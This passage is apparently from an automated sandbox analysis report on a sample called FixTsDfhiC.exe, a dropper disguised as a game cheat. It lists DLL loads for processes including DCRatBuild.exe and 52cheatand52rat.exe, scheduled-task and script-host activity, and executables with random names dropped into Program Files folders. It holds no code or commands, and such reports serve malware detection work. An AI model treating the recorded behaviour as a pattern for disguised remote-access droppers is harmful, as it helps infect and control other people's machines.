                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                        Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dxgidebug.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: riched20.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: usp10.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msls31.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: mscoree.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: apphelp.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: kernel.appcore.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: version.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: uxtheme.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: windows.storage.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: wldp.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: profapi.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: cryptsp.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: rsaenh.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: cryptbase.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: sspicli.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: amsi.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: userenv.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: ntmarta.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: wbemcomn.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: propsys.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: dlnashext.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: wpdshext.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: edputil.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: urlmon.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: iertutil.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: srvcli.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: netutils.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: windows.staterepositoryps.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: wintypes.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: appresolver.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: bcp47langs.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: slc.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: sppc.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\blockweb\portrefNet.exeSection loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Users\user\Desktop\FixTsDfhiC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\Windows Portable Devices\ukzoUeHPfeDwGdTDRNL.exe
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\Windows Portable Devices\4811fe426320bd
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\7-Zip\Lang\ukzoUeHPfeDwGdTDRNL.exe
                        Source: C:\blockweb\portrefNet.exeDirectory created: C:\Program Files\7-Zip\Lang\4811fe426320bd
                        Source: FixTsDfhiC.exeStatic file information: File size 13317632 > 1048576
                        Source: FixTsDfhiC.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0xcb1400
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Lunch LaCheat.exe, 00000022.00000003.1808515940.0000000004F74000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824780821.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1805618598.000000000396E000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823791845.0000000003966000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1807504603.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1823496476.00000000036D8000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1808928510.0000000005207000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000003.1806529098.0000000003BFA000.00000004.00000020.00020000.00000000.sdmp, Lunch LaCheat.exe, 00000022.00000002.1824009704.0000000003BF0000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000003.1807258543.0000000004D80000.00000004.00000020.00020000.00000000.sdmp, DCRatBuild.exe, 00000023.00000000.1805391607.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmp, DCRatBuild.exe, 